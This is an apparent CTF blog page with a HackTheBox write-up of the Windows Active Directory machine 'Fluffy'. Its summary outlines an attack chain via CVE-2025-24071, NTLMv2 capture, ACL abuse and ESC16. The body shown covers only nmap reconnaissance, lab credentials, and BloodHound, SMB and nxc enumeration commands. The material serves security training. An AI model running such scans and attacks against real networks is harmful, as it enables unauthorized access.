<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>Fluffy | HackTheBox -
</title><link rel=alternate href=https://h4r1337.github.io/posts/fluffy/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/fluffy/><link rel=prev href=https://h4r1337.github.io/posts/shellshock/><link rel=next href=https://h4r1337.github.io/posts/jeeves/><meta name=description content="Fluffy is an assumed breach Active Directory machine. We will get initial credentials for user `j.fleischman` and from there we have to exploit CVE-2025-24071, which involves crafting malicious library-ms files in a zip archive. The zip file, which was uploaded to an SMB share, is then opened by another user triggering the exploit and we will get NTLMv2 of that user. We then exploit `GenericWrite`/`GenericAll` ACEs to further pivot into the machine. In the end we will exploit ESC16 to gain access on the Administrator account."><meta name=keywords content="AD,Assumed-Breach,CVE-2025-24071,library-ms,zip,HackTheBox,nxc,shadow-credentials,kerberoasting,genericall,genericwrite,responder,esc16,certipy,bloodyad,htb-fluffy,hashcat,bloodhound,rusthound,adcs,htb,writeup,walkthrough,exploit"><meta property="og:url" content="https://h4r1337.github.io/posts/fluffy/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="Fluffy | HackTheBox"><meta property="og:description" content="Fluffy is an assumed breach Active Directory machine. We will get initial credentials for user `j.fleischman` and from there we have to exploit CVE-2025-24071, which involves crafting malicious library-ms files in a zip archive. The zip file, which was uploaded to an SMB share, is then opened by another user triggering the exploit and we will get NTLMv2 of that user. We then exploit `GenericWrite`/`GenericAll` ACEs to further pivot into the machine. In the end we will exploit ESC16 to gain access on the Administrator account."><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2026-05-27T17:04:26+05:30"><meta property="article:modified_time" content="2026-05-27T17:04:26+05:30"><meta property="article:tag" content="AD"><meta property="article:tag" content="Assumed-Breach"><meta property="article:tag" content="CVE-2025-24071"><meta property="article:tag" content="Library-Ms"><meta property="article:tag" content="Zip"><meta property="article:tag" content="HackTheBox"><meta property="og:image" content="https://h4r1337.github.io/img/fluffy/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/tombwatcher/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/postman/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/trick/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/facts/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/jeeves/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/resource/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/fluffy/cover.webp"><meta name=twitter:title content="Fluffy | HackTheBox"><meta name=twitter:description content="Fluffy is an assumed breach Active Directory machine. We will get initial credentials for user `j.fleischman` and from there we have to exploit CVE-2025-24071, which involves crafting malicious library-ms files in a zip archive. The zip file, which was uploaded to an SMB share, is then opened by another user triggering the exploit and we will get NTLMv2 of that user. We then exploit `GenericWrite`/`GenericAll` ACEs to further pivot into the machine. In the end we will exploit ESC16 to gain access on the Administrator account."><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.4e9051d9b14352f5f7ae64b91bb7e552a03ad7b9d27cbffac49ee91418235015.css integrity="sha256-TpBR2bFDUvX3rmS5G7flUqA617nSfL/6xJ7pFBgjUBU="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/ad/ class=tag>AD</a>
,
<a href=https://h4r1337.github.io/tags/assumed-breach/ class=tag>ASSUMED-BREACH</a>
,
<a href=https://h4r1337.github.io/tags/cve-2025-24071/ class=tag>CVE-2025-24071</a>
,
<a href=https://h4r1337.github.io/tags/library-ms/ class=tag>LIBRARY-MS</a>
,
<a href=https://h4r1337.github.io/tags/zip/ class=tag>ZIP</a>
,
<a href=https://h4r1337.github.io/tags/hackthebox/ class=tag>HACKTHEBOX</a>
,
<a href=https://h4r1337.github.io/tags/nxc/ class=tag>NXC</a>
,
<a href=https://h4r1337.github.io/tags/shadow-credentials/ class=tag>SHADOW-CREDENTIALS</a>
,
<a href=https://h4r1337.github.io/tags/kerberoasting/ class=tag>KERBEROASTING</a>
,
<a href=https://h4r1337.github.io/tags/genericall/ class=tag>GENERICALL</a>
,
<a href=https://h4r1337.github.io/tags/genericwrite/ class=tag>GENERICWRITE</a>
,
<a href=https://h4r1337.github.io/tags/responder/ class=tag>RESPONDER</a>
,
<a href=https://h4r1337.github.io/tags/esc16/ class=tag>ESC16</a>
,
<a href=https://h4r1337.github.io/tags/certipy/ class=tag>CERTIPY</a>
,
<a href=https://h4r1337.github.io/tags/bloodyad/ class=tag>BLOODYAD</a>
,
<a href=https://h4r1337.github.io/tags/htb-fluffy/ class=tag>HTB-FLUFFY</a>
,
<a href=https://h4r1337.github.io/tags/hashcat/ class=tag>HASHCAT</a>
,
<a href=https://h4r1337.github.io/tags/bloodhound/ class=tag>BLOODHOUND</a>
,
<a href=https://h4r1337.github.io/tags/rusthound/ class=tag>RUSTHOUND</a>
,
<a href=https://h4r1337.github.io/tags/adcs/ class=tag>ADCS</a></span></div><h1 class=header-title itemprop=headline>Fluffy | HackTheBox</h1><div class=post-meta><time datetime="2026-05-27 17:04:26 +0530 +0530" itemprop=datePublished>2026-05-27
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2026-05-27 17:04:26 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>Fluffy is an assumed breach Active Directory machine. We will get initial credentials for user `j.fleischman` and from there we have to exploit CVE-2025-24071, which involves crafting malicious library-ms files in a zip archive. The zip file, which was uploaded to an SMB share, is then opened by another user triggering the exploit and we will get NTLMv2 of that user. We then exploit `GenericWrite`/`GenericAll` ACEs to further pivot into the machine. In the end we will exploit ESC16 to gain access on the Administrator account.</span></div></header><div class=page-content itemprop=articleBody><h3 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h3><figure><img src=/img/fluffy/cover.webp></figure><table><thead><tr><th style=text-align:center>Title</th><th style=text-align:center><a href=https://app.hackthebox.com/machines/Fluffy>Fluffy</a></th></tr></thead><tbody><tr><td style=text-align:center>Difficulty</td><td style=text-align:center>Easy</td></tr><tr><td style=text-align:center>Machine</td><td style=text-align:center>Windows</td></tr><tr><td style=text-align:center>Makers</td><td style=text-align:center><a href=https://app.hackthebox.com/users/1253217><img src=https://www.hackthebox.com/badge/image/1253217 alt style=display:unset></a> & <a href=https://app.hackthebox.com/users/389926><img src=https://www.hackthebox.com/badge/image/389926 alt style=display:unset></a></td></tr></tbody></table><br><div class="alert alert-tip collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-bulb"></i><p class=alert-heading>About Fluffy</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>Fluffy is an assumed breach Active Directory machine. We will get initial credentials for user <code>j.fleischman</code> and from there we have to exploit CVE-2025-24071, which involves crafting malicious library-ms files in a zip archive. The zip file, which was uploaded to an SMB share, is then opened by another user triggering the exploit and we will get NTLMv2 of that user. We then exploit <code>GenericWrite</code>/<code>GenericAll</code> ACEs to further pivot into the machine. In the end we will exploit ESC16 to gain access on the Administrator account.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><hr><h2 id=information-gathering><a href=#information-gathering class=anchor-head aria-label=Anchor></a>Information Gathering</h2><p>Scanned all TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -p- --min-rate <span style=color:#d3869b>10000</span> -vv $IP -oA recon/nmap/ports
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.129.165.76
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>65517</span> filtered tcp ports <span style=color:#fe8019>(</span>no-response<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>PORT      STATE SERVICE          REASON
</span></span><span style=display:flex><span>53/tcp    open  domain           syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>88/tcp    open  kerberos-sec     syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>139/tcp   open  netbios-ssn      syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>389/tcp   open  ldap             syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>445/tcp   open  microsoft-ds     syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>464/tcp   open  kpasswd5         syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>593/tcp   open  http-rpc-epmap   syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>636/tcp   open  ldapssl          syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>3268/tcp  open  globalcatLDAP    syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>3269/tcp  open  globalcatLDAPssl syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>5985/tcp  open  wsman            syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>9389/tcp  open  adws             syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>49667/tcp open  unknown          syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>49689/tcp open  unknown          syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>49690/tcp open  unknown          syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>49698/tcp open  unknown          syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>49714/tcp open  unknown          syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>49727/tcp open  unknown          syn-ack ttl <span style=color:#d3869b>127</span>
</span></span></code></pre></div><p>Enumerated open TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -p53,88,139,389,445,464,593,636,3268,3269,5985,9389 -sC -sV -vv $IP -oA recon/nmap/service
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.129.165.76
</span></span><span style=display:flex><span>Host is up, received echo-reply ttl <span style=color:#d3869b>127</span> <span style=color:#fe8019>(</span>0.54s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT     STATE SERVICE       REASON          VERSION
</span></span><span style=display:flex><span>53/tcp   open  domain        syn-ack ttl <span style=color:#d3869b>127</span> Simple DNS Plus
</span></span><span style=display:flex><span>88/tcp   open  kerberos-sec  syn-ack ttl <span style=color:#d3869b>127</span> Microsoft Windows Kerberos <span style=color:#fe8019>(</span>server time: 2026-05-26 16:46:29Z<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>139/tcp  open  netbios-ssn   syn-ack ttl <span style=color:#d3869b>127</span> Microsoft Windows netbios-ssn
</span></span><span style=display:flex><span>389/tcp  open  ldap          syn-ack ttl <span style=color:#d3869b>127</span> Microsoft Windows Active Directory LDAP <span style=color:#fe8019>(</span>Domain: fluffy.htb, Site: Default-First-Site-Name<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>| ssl-cert: Subject: 
</span></span><span style=display:flex><span>| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
</span></span><span style=display:flex><span>| Issuer: commonName<span style=color:#fe8019>=</span>fluffy-DC01-CA/domainComponent<span style=color:#fe8019>=</span>fluffy
</span></span><span style=display:flex><span>| Public Key type: rsa
</span></span><span style=display:flex><span>| Public Key bits: <span style=color:#d3869b>2048</span>
</span></span><span style=display:flex><span>| Signature Algorithm: sha256WithRSAEncryption
</span></span><span style=display:flex><span>| Not valid before: 2026-04-30T16:09:59
</span></span><span style=display:flex><span>| Not valid after:  2106-04-30T16:09:59
</span></span><span style=display:flex><span>| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 <span style=color:#d3869b>4726</span> 4d67
</span></span><span style=display:flex><span>| SHA-1:   <span style=color:#d3869b>6867</span> <span style=color:#d3869b>9230</span> <span style=color:#d3869b>5123</span> dcf1 <span style=color:#d3869b>9352</span> e081 <span style=color:#d3869b>4148</span> 7fef 13c7 6c0a
</span></span><span style=display:flex><span>| SHA-256: a90d f4d0 6fe1 <span style=color:#d3869b>9052</span> 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
</span></span><span style=display:flex><span>| -----BEGIN CERTIFICATE-----
</span></span><span style=display:flex><span>| MIIFmjCCBIKgAwIBAgITUAAAABHyG6GZUVLpIQACAAAAETANBgkqhkiG9w0BAQsF
</span></span><span style=display:flex><span>| &lt;----------- SNIP ----------&gt;
</span></span><span style=display:flex><span>| mmZJw5lCPljYhiN3Rh/8vUlg6IQlJEsyAJL1Y9MuaTJOuyf2PZPCJURtKhgdiA<span style=color:#fe8019>==</span>
</span></span><span style=display:flex><span>|_-----END CERTIFICATE-----
</span></span><span style=display:flex><span>|_ssl-date: 2026-05-26T16:48:04+00:00; +7h02m51s from scanner time.
</span></span><span style=display:flex><span>445/tcp  open  microsoft-ds? syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>464/tcp  open  kpasswd5?     syn-ack ttl <span style=color:#d3869b>127</span>
</span></span><span style=display:flex><span>593/tcp  open  ncacn_http    syn-ack ttl <span style=color:#d3869b>127</span> Microsoft Windows RPC over HTTP 1.0
</span></span><span style=display:flex><span>636/tcp  open  ssl/ldap      syn-ack ttl <span style=color:#d3869b>127</span> Microsoft Windows Active Directory LDAP <span style=color:#fe8019>(</span>Domain: fluffy.htb, Site: Default-First-Site-Name<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>| ssl-cert: Subject: 
</span></span><span style=display:flex><span>| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
</span></span><span style=display:flex><span>| Issuer: commonName<span style=color:#fe8019>=</span>fluffy-DC01-CA/domainComponent<span style=color:#fe8019>=</span>fluffy
</span></span><span style=display:flex><span>| Public Key type: rsa
</span></span><span style=display:flex><span>| Public Key bits: <span style=color:#d3869b>2048</span>
</span></span><span style=display:flex><span>| Signature Algorithm: sha256WithRSAEncryption
</span></span><span style=display:flex><span>| Not valid before: 2026-04-30T16:09:59
</span></span><span style=display:flex><span>| Not valid after:  2106-04-30T16:09:59
</span></span><span style=display:flex><span>| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 <span style=color:#d3869b>4726</span> 4d67
</span></span><span style=display:flex><span>| SHA-1:   <span style=color:#d3869b>6867</span> <span style=color:#d3869b>9230</span> <span style=color:#d3869b>5123</span> dcf1 <span style=color:#d3869b>9352</span> e081 <span style=color:#d3869b>4148</span> 7fef 13c7 6c0a
</span></span><span style=display:flex><span>| SHA-256: a90d f4d0 6fe1 <span style=color:#d3869b>9052</span> 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
</span></span><span style=display:flex><span>| -----BEGIN CERTIFICATE-----
</span></span><span style=display:flex><span>| MIIFmjCCBIKgAwIBAgITUAAAABHyG6GZUVLpIQACAAAAETANBgkqhkiG9w0BAQsF
</span></span><span style=display:flex><span>| &lt;----------- SNIP ----------&gt;
</span></span><span style=display:flex><span>| mmZJw5lCPljYhiN3Rh/8vUlg6IQlJEsyAJL1Y9MuaTJOuyf2PZPCJURtKhgdiA<span style=color:#fe8019>==</span>
</span></span><span style=display:flex><span>|_-----END CERTIFICATE-----
</span></span><span style=display:flex><span>3268/tcp open  ldap          syn-ack ttl <span style=color:#d3869b>127</span> Microsoft Windows Active Directory LDAP <span style=color:#fe8019>(</span>Domain: fluffy.htb, Site: Default-First-Site-Name<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_ssl-date: 2026-05-26T16:48:04+00:00; +7h02m51s from scanner time.
</span></span><span style=display:flex><span>| ssl-cert: Subject: 
</span></span><span style=display:flex><span>| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
</span></span><span style=display:flex><span>| Issuer: commonName<span style=color:#fe8019>=</span>fluffy-DC01-CA/domainComponent<span style=color:#fe8019>=</span>fluffy
</span></span><span style=display:flex><span>| Public Key type: rsa
</span></span><span style=display:flex><span>| Public Key bits: <span style=color:#d3869b>2048</span>
</span></span><span style=display:flex><span>| Signature Algorithm: sha256WithRSAEncryption
</span></span><span style=display:flex><span>| Not valid before: 2026-04-30T16:09:59
</span></span><span style=display:flex><span>| Not valid after:  2106-04-30T16:09:59
</span></span><span style=display:flex><span>| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 <span style=color:#d3869b>4726</span> 4d67
</span></span><span style=display:flex><span>| SHA-1:   <span style=color:#d3869b>6867</span> <span style=color:#d3869b>9230</span> <span style=color:#d3869b>5123</span> dcf1 <span style=color:#d3869b>9352</span> e081 <span style=color:#d3869b>4148</span> 7fef 13c7 6c0a
</span></span><span style=display:flex><span>| SHA-256: a90d f4d0 6fe1 <span style=color:#d3869b>9052</span> 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
</span></span><span style=display:flex><span>| -----BEGIN CERTIFICATE-----
</span></span><span style=display:flex><span>| MIIFmjCCBIKgAwIBAgITUAAAABHyG6GZUVLpIQACAAAAETANBgkqhkiG9w0BAQsF
</span></span><span style=display:flex><span>| &lt;----------- SNIP -----------&gt;
</span></span><span style=display:flex><span>| mmZJw5lCPljYhiN3Rh/8vUlg6IQlJEsyAJL1Y9MuaTJOuyf2PZPCJURtKhgdiA<span style=color:#fe8019>==</span>
</span></span><span style=display:flex><span>|_-----END CERTIFICATE-----
</span></span><span style=display:flex><span>3269/tcp open  ssl/ldap      syn-ack ttl <span style=color:#d3869b>127</span> Microsoft Windows Active Directory LDAP <span style=color:#fe8019>(</span>Domain: fluffy.htb, Site: Default-First-Site-Name<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>| ssl-cert: Subject: 
</span></span><span style=display:flex><span>| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
</span></span><span style=display:flex><span>| Issuer: commonName<span style=color:#fe8019>=</span>fluffy-DC01-CA/domainComponent<span style=color:#fe8019>=</span>fluffy
</span></span><span style=display:flex><span>| Public Key type: rsa
</span></span><span style=display:flex><span>| Public Key bits: <span style=color:#d3869b>2048</span>
</span></span><span style=display:flex><span>| Signature Algorithm: sha256WithRSAEncryption
</span></span><span style=display:flex><span>| Not valid before: 2026-04-30T16:09:59
</span></span><span style=display:flex><span>| Not valid after:  2106-04-30T16:09:59
</span></span><span style=display:flex><span>| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 <span style=color:#d3869b>4726</span> 4d67
</span></span><span style=display:flex><span>| SHA-1:   <span style=color:#d3869b>6867</span> <span style=color:#d3869b>9230</span> <span style=color:#d3869b>5123</span> dcf1 <span style=color:#d3869b>9352</span> e081 <span style=color:#d3869b>4148</span> 7fef 13c7 6c0a
</span></span><span style=display:flex><span>| SHA-256: a90d f4d0 6fe1 <span style=color:#d3869b>9052</span> 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
</span></span><span style=display:flex><span>| -----BEGIN CERTIFICATE-----
</span></span><span style=display:flex><span>| MIIFmjCCBIKgAwIBAgITUAAAABHyG6GZUVLpIQACAAAAETANBgkqhkiG9w0BAQsF
</span></span><span style=display:flex><span>| &lt;--------- SNIP -----------&gt;
</span></span><span style=display:flex><span>| mmZJw5lCPljYhiN3Rh/8vUlg6IQlJEsyAJL1Y9MuaTJOuyf2PZPCJURtKhgdiA<span style=color:#fe8019>==</span>
</span></span><span style=display:flex><span>|_-----END CERTIFICATE-----
</span></span><span style=display:flex><span>|_ssl-date: 2026-05-26T16:48:04+00:00; +7h02m50s from scanner time.
</span></span><span style=display:flex><span>5985/tcp open  http          syn-ack ttl <span style=color:#d3869b>127</span> Microsoft HTTPAPI httpd 2.0 <span style=color:#fe8019>(</span>SSDP/UPnP<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_http-title: Not Found
</span></span><span style=display:flex><span>|_http-server-header: Microsoft-HTTPAPI/2.0
</span></span><span style=display:flex><span>9389/tcp open  mc-nmf        syn-ack ttl <span style=color:#d3869b>127</span> .NET Message Framing
</span></span><span style=display:flex><span>Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Host script results:
</span></span><span style=display:flex><span>| smb2-security-mode: 
</span></span><span style=display:flex><span>|   3.1.1: 
</span></span><span style=display:flex><span>|_    Message signing enabled and required
</span></span><span style=display:flex><span>| smb2-time: 
</span></span><span style=display:flex><span>|   date: 2026-05-26T16:47:24
</span></span><span style=display:flex><span>|_  start_date: N/A
</span></span><span style=display:flex><span>| p2p-conficker: 
</span></span><span style=display:flex><span>|   Checking <span style=color:#fe8019>for</span> Conficker.C or higher...
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>1</span> <span style=color:#fe8019>(</span>port 12193/tcp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>2</span> <span style=color:#fe8019>(</span>port 54280/tcp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>3</span> <span style=color:#fe8019>(</span>port 9314/udp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>4</span> <span style=color:#fe8019>(</span>port 48055/udp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_  0/4 checks are positive: Host is CLEAN or ports are blocked
</span></span><span style=display:flex><span>|_clock-skew: mean: 7h02m51s, deviation: 2s, median: 7h02m50s
</span></span></code></pre></div><p>Added <code>fluffy.htb</code> and <code>DC01</code> to <code>/etc/hosts</code> file.</p><hr><h2 id=enumeration><a href=#enumeration class=anchor-head aria-label=Anchor></a>Enumeration</h2><h3 id=initial-credentials><a href=#initial-credentials class=anchor-head aria-label=Anchor></a>Initial Credentials</h3><p>Since this is an assumed breach machine we got the credentials <code>j.fleischman:J0elTHEM4n1990!</code></p><figure><img src=/img/fluffy/Pasted%20image%2020260526152714.webp></figure><p>Let&rsquo;s collect bloodhound data in the background</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>rusthound-ce -d fluffy.htb -u $USER -p $PASS --zip
</span></span></code></pre></div><h3 id=smb---port-445><a href=#smb---port-445 class=anchor-head aria-label=Anchor></a>SMB - Port 445</h3><p>After listing the shares, we found</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>smbclient -L //dc01.fluffy.htb --user $USER --password $PASS
</span></span></code></pre></div><figure><img src=/img/fluffy/Pasted%20image%2020260526153639.webp></figure><p>Initially I was gettting <code>NetBIOSTimeout</code> error on the target when using <code>nxc</code>, but the issue can be rectified by using the <code>--smb-timout</code> flag</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nxc smb fluffy.htb -u $USER -p $PASS --smb-timeout <span style=color:#d3869b>100</span>
